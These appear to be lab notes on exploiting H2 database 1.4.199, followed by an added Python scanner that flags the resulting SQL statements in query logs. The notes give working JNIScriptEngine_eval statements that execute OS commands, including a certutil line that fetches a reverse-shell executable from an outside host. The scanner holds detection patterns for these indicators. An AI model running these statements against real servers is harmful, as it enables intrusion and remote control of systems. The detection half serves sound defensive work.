Only for H2 1.4.199

  1. Follow the instructions in exploit 49384.
  2. To run other commands, use cmd /c dir (replacing dir with the command you want).
  3. Full example:
    CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c dir").getInputStream()).useDelimiter("\Z").next()');
  4. certutil can then be used to grab the reverse shell (must run WITHOUT cmd /c):
    CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -f -urlcache http://192.168.49.155/pg80_64.exe pg80.exe").getInputStream()).useDelimiter("\Z").next()');
  5. In summary, try with and without cmd /c, and use a double backslash (\\) in directory paths. Sometimes a file put in C:\Windows\Temp\ cannot be located using dir; just try to run it anyway.
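
Detection side of the steps above, as an added example (not part of the original notes or of exploit 49384): a Python scan of logged SQL statements for the indicators these calls leave, which also pulls out the command string passed to exec() for triage. It assumes statement text is available one per line (for example from a database trace or query log); the rule names, the scan function and the sample lines are constructed for illustration.

```python
import re

# Indicators taken from the statements shown in these notes.
RULES = {
    # Alias name used in the CALL statements (SQL identifiers: match any case).
    "jni_script_engine": re.compile(r"JNIScriptEngine", re.I),
    # Java process execution reached through the script engine.
    "runtime_exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec"),
    # certutil used as a downloader (-urlcache) inside one quoted command.
    "certutil_download": re.compile(r"certutil\b[^\"']*-urlcache", re.I),
    # Command wrapped in the Windows shell.
    "cmd_wrapper": re.compile(r"\bcmd(\.exe)?\s+/c\b", re.I),
}

# Captures the OS command string handed to exec("...").
EXEC_ARG = re.compile(r"\.exec\(\s*\"([^\"]*)\"")


def scan(statements):
    """Return one finding per statement that matches at least one rule."""
    findings = []
    for lineno, stmt in enumerate(statements, 1):
        tags = sorted(name for name, rx in RULES.items() if rx.search(stmt))
        if not tags:
            continue
        m = EXEC_ARG.search(stmt)
        findings.append(
            {"line": lineno, "tags": tags, "command": m.group(1) if m else None}
        )
    return findings


# Constructed sample statements; 192.0.2.10 is a documentation-only address.
SAMPLE = [
    "SELECT * FROM USERS WHERE ID = 7;",
    r"""CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c dir").getInputStream()).useDelimiter("\\Z").next()');""",
    r"""CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -f -urlcache http://192.0.2.10/sample.exe sample.exe").getInputStream()).useDelimiter("\\Z").next()');""",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding["line"], ",".join(finding["tags"]), "->", finding["command"])
```

A hit on jni_script_engine together with runtime_exec is the strongest signal here, since ordinary application queries have no reason to contain either.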